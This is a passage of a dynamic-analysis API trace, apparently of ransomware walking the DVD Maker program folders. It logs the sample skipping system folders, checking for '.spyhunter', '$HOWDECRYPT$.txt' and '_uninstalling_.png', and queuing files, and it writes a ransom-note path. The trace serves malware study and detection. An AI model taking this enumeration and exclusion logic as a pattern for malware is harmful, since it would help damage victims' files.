Maker\\Shared\\DvdStyles\\Performance\\redmenu.png") returned 71 [0092.825] StrStrIW (lpFirst="redmenu.png", lpSrch=".spyhunter") returned 0x0 [0092.825] lstrcmpW (lpString1="redmenu.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.825] lstrcmpW (lpString1="redmenu.png", lpString2="_uninstalling_.png") returned 1 [0092.825] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png") returned 71 [0092.825] GetProcessHeap () returned 0x2c0000 [0092.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e3b0 [0092.825] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0092.825] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.825] lstrcmpiW (lpString1="Scene_loop.wmv", lpString2="Windows") returned -1 [0092.825] lstrlenW (lpString="Windows") returned 7 [0092.825] lstrcmpiW (lpString1="Scene_loop.wmv", lpString2="$Recycle.bin") returned 1 [0092.825] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.825] lstrcmpiW (lpString1="Scene_loop.wmv", lpString2="System Volume Information") returned -1 [0092.825] lstrlenW (lpString="System Volume Information") returned 25 [0092.825] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv") returned 74 [0092.826] StrStrIW (lpFirst="Scene_loop.wmv", lpSrch=".spyhunter") returned 0x0 [0092.826] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.826] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0092.826] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv") returned 74 [0092.826] GetProcessHeap () returned 0x2c0000 [0092.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346aa8 [0092.826] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0092.826] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.826] lstrcmpiW (lpString1="Scene_loop_PAL.wmv", lpString2="Windows") returned -1 [0092.826] lstrlenW (lpString="Windows") returned 7 [0092.826] lstrcmpiW (lpString1="Scene_loop_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.826] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.826] lstrcmpiW (lpString1="Scene_loop_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.826] lstrlenW (lpString="System Volume Information") returned 25 [0092.826] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv") returned 78 [0092.826] StrStrIW (lpFirst="Scene_loop_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.826] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.826] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.826] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv") returned 78 [0092.826] GetProcessHeap () returned 0x2c0000 [0092.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377e20 [0092.826] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0092.826] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.826] lstrcmpiW (lpString1="TitleButtonIcon.png", lpString2="Windows") returned -1 [0092.826] lstrlenW (lpString="Windows") returned 7 [0092.827] lstrcmpiW (lpString1="TitleButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0092.827] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.827] lstrcmpiW (lpString1="TitleButtonIcon.png", lpString2="System Volume Information") returned 1 [0092.827] lstrlenW (lpString="System Volume Information") returned 25 [0092.827] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 79 [0092.827] StrStrIW (lpFirst="TitleButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0092.827] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.827] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0092.827] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 79 [0092.827] GetProcessHeap () returned 0x2c0000 [0092.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3780d8 [0092.827] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0092.827] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.827] lstrcmpiW (lpString1="TitleButtonSubpicture.png", lpString2="Windows") returned -1 [0092.827] lstrlenW (lpString="Windows") returned 7 [0092.827] lstrcmpiW (lpString1="TitleButtonSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.827] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.827] lstrcmpiW (lpString1="TitleButtonSubpicture.png", lpString2="System Volume Information") returned 1 [0092.827] lstrlenW (lpString="System Volume Information") returned 25 [0092.827] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 85 [0092.827] StrStrIW (lpFirst="TitleButtonSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.827] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.827] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.827] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 85 [0092.828] GetProcessHeap () returned 0x2c0000 [0092.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3553b0 [0092.828] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0092.828] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.828] lstrcmpiW (lpString1="Title_Page.wmv", lpString2="Windows") returned -1 [0092.828] lstrlenW (lpString="Windows") returned 7 [0092.828] lstrcmpiW (lpString1="Title_Page.wmv", lpString2="$Recycle.bin") returned 1 [0092.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.828] lstrcmpiW (lpString1="Title_Page.wmv", lpString2="System Volume Information") returned 1 [0092.828] lstrlenW (lpString="System Volume Information") returned 25 [0092.828] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 74 [0092.828] StrStrIW (lpFirst="Title_Page.wmv", lpSrch=".spyhunter") returned 0x0 [0092.828] lstrcmpW (lpString1="Title_Page.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.828] lstrcmpW (lpString1="Title_Page.wmv", lpString2="_uninstalling_.png") returned 1 [0092.828] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 74 [0092.828] GetProcessHeap () returned 0x2c0000 [0092.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346b88 [0092.828] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0092.828] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.828] lstrcmpiW (lpString1="Title_Page_PAL.wmv", lpString2="Windows") returned -1 [0092.828] lstrlenW (lpString="Windows") returned 7 [0092.828] lstrcmpiW (lpString1="Title_Page_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.828] lstrcmpiW (lpString1="Title_Page_PAL.wmv", lpString2="System Volume Information") returned 1 [0092.829] lstrlenW (lpString="System Volume Information") returned 25 [0092.829] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 78 [0092.829] StrStrIW (lpFirst="Title_Page_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.829] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.829] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 78 [0092.829] GetProcessHeap () returned 0x2c0000 [0092.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377ff0 [0092.829] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0092.829] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.829] lstrcmpiW (lpString1="title_trans_notes.wmv", lpString2="Windows") returned -1 [0092.829] lstrlenW (lpString="Windows") returned 7 [0092.829] lstrcmpiW (lpString1="title_trans_notes.wmv", lpString2="$Recycle.bin") returned 1 [0092.829] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.829] lstrcmpiW (lpString1="title_trans_notes.wmv", lpString2="System Volume Information") returned 1 [0092.829] lstrlenW (lpString="System Volume Information") returned 25 [0092.829] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 81 [0092.829] StrStrIW (lpFirst="title_trans_notes.wmv", lpSrch=".spyhunter") returned 0x0 [0092.829] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.829] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="_uninstalling_.png") returned 1 [0092.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 81 [0092.829] GetProcessHeap () returned 0x2c0000 [0092.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f238 [0092.829] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0092.830] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.830] lstrcmpiW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="Windows") returned -1 [0092.830] lstrlenW (lpString="Windows") returned 7 [0092.830] lstrcmpiW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.830] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.830] lstrcmpiW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="System Volume Information") returned 1 [0092.830] lstrlenW (lpString="System Volume Information") returned 25 [0092.830] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv") returned 85 [0092.830] StrStrIW (lpFirst="Title_Trans_Notes_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.830] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.830] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.830] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv") returned 85 [0092.830] GetProcessHeap () returned 0x2c0000 [0092.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355790 [0092.830] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0092.830] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.830] lstrcmpiW (lpString1="title_trans_scene.wmv", lpString2="Windows") returned -1 [0092.830] lstrlenW (lpString="Windows") returned 7 [0092.830] lstrcmpiW (lpString1="title_trans_scene.wmv", lpString2="$Recycle.bin") returned 1 [0092.830] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.830] lstrcmpiW (lpString1="title_trans_scene.wmv", lpString2="System Volume Information") returned 1 [0092.830] lstrlenW (lpString="System Volume Information") returned 25 [0092.830] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv") returned 81 [0092.830] StrStrIW (lpFirst="title_trans_scene.wmv", lpSrch=".spyhunter") returned 0x0 [0092.831] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.831] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="_uninstalling_.png") returned 1 [0092.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv") returned 81 [0092.831] GetProcessHeap () returned 0x2c0000 [0092.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ee78 [0092.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0092.831] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.831] lstrcmpiW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="Windows") returned -1 [0092.831] lstrlenW (lpString="Windows") returned 7 [0092.831] lstrcmpiW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.831] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.831] lstrcmpiW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="System Volume Information") returned 1 [0092.831] lstrlenW (lpString="System Volume Information") returned 25 [0092.831] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv") returned 85 [0092.831] StrStrIW (lpFirst="Title_Trans_Scene_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.831] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.831] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv") returned 85 [0092.831] GetProcessHeap () returned 0x2c0000 [0092.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355698 [0092.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0092.831] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.831] lstrcmpiW (lpString1="userContent_16x9_imagemask.png", lpString2="Windows") returned -1 [0092.831] lstrlenW (lpString="Windows") returned 7 [0092.832] lstrcmpiW (lpString1="userContent_16x9_imagemask.png", lpString2="$Recycle.bin") returned 1 [0092.832] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.832] lstrcmpiW (lpString1="userContent_16x9_imagemask.png", lpString2="System Volume Information") returned 1 [0092.832] lstrlenW (lpString="System Volume Information") returned 25 [0092.832] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png") returned 90 [0092.832] StrStrIW (lpFirst="userContent_16x9_imagemask.png", lpSrch=".spyhunter") returned 0x0 [0092.832] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.832] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="_uninstalling_.png") returned 1 [0092.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png") returned 90 [0092.832] GetProcessHeap () returned 0x2c0000 [0092.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a260 [0092.832] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0092.832] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.832] lstrcmpiW (lpString1="whitemenu.png", lpString2="Windows") returned -1 [0092.832] lstrlenW (lpString="Windows") returned 7 [0092.832] lstrcmpiW (lpString1="whitemenu.png", lpString2="$Recycle.bin") returned 1 [0092.832] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.832] lstrcmpiW (lpString1="whitemenu.png", lpString2="System Volume Information") returned 1 [0092.832] lstrlenW (lpString="System Volume Information") returned 25 [0092.832] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png") returned 73 [0092.832] StrStrIW (lpFirst="whitemenu.png", lpSrch=".spyhunter") returned 0x0 [0092.832] lstrcmpW (lpString1="whitemenu.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.832] lstrcmpW (lpString1="whitemenu.png", lpString2="_uninstalling_.png") returned 1 [0092.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png") returned 73 [0092.832] GetProcessHeap () returned 0x2c0000 [0092.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0092.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0092.840] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.840] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.841] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\$HOWDECRYPT$.txt") returned 76 [0092.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\$HOWDECRYPT$.txt") returned 76 [0092.841] GetProcessHeap () returned 0x2c0000 [0092.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3781c0 [0092.841] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.843] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.843] lstrcmpiW (lpString1="Pets", lpString2="Windows") returned -1 [0092.843] lstrlenW (lpString="Windows") returned 7 [0092.843] lstrcmpiW (lpString1="Pets", lpString2="$Recycle.bin") returned 1 [0092.843] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.843] lstrcmpiW (lpString1="Pets", lpString2="System Volume Information") returned -1 [0092.843] lstrlenW (lpString="System Volume Information") returned 25 [0092.843] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 52 [0092.843] lstrcmpW (lpString1="Pets", lpString2=".") returned 1 [0092.843] lstrcmpW (lpString1="Pets", lpString2="..") returned 1 [0092.843] GetProcessHeap () returned 0x2c0000 [0092.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.844] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*") returned 54 [0092.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.847] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.847] lstrlenW (lpString="Windows") returned 7 [0092.847] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.848] lstrlenW (lpString="System Volume Information") returned 25 [0092.848] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\.") returned 54 [0092.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.848] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.848] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.848] lstrlenW (lpString="Windows") returned 7 [0092.848] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.848] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.848] lstrlenW (lpString="System Volume Information") returned 25 [0092.848] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\..") returned 55 [0092.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.848] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.848] lstrcmpiW (lpString1="Notes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0092.848] lstrlenW (lpString="Windows") returned 7 [0092.848] lstrcmpiW (lpString1="Notes_INTRO_BG.wmv", lpString2="$Recycle.bin") returned 1 [0092.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.848] lstrcmpiW (lpString1="Notes_INTRO_BG.wmv", lpString2="System Volume Information") returned -1 [0092.848] lstrlenW (lpString="System Volume Information") returned 25 [0092.848] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv") returned 71 [0092.849] StrStrIW (lpFirst="Notes_INTRO_BG.wmv", lpSrch=".spyhunter") returned 0x0 [0092.849] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.849] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0092.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv") returned 71 [0092.849] GetProcessHeap () returned 0x2c0000 [0092.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e560 [0092.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.849] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.851] lstrcmpiW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0092.851] lstrlenW (lpString="Windows") returned 7 [0092.851] lstrcmpiW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.851] lstrcmpiW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.851] lstrlenW (lpString="System Volume Information") returned 25 [0092.851] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv") returned 75 [0092.851] StrStrIW (lpFirst="Notes_INTRO_BG_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.851] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.851] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv") returned 75 [0092.851] GetProcessHeap () returned 0x2c0000 [0092.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346d48 [0092.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.852] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0092.852] lstrlenW (lpString="Windows") returned 7 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG.wmv", lpString2="$Recycle.bin") returned 1 [0092.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG.wmv", lpString2="System Volume Information") returned -1 [0092.852] lstrlenW (lpString="System Volume Information") returned 25 [0092.852] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv") returned 70 [0092.852] StrStrIW (lpFirst="Notes_LOOP_BG.wmv", lpSrch=".spyhunter") returned 0x0 [0092.852] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.852] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0092.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv") returned 70 [0092.852] GetProcessHeap () returned 0x2c0000 [0092.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e200 [0092.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.852] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0092.852] lstrlenW (lpString="Windows") returned 7 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.852] lstrcmpiW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.852] lstrlenW (lpString="System Volume Information") returned 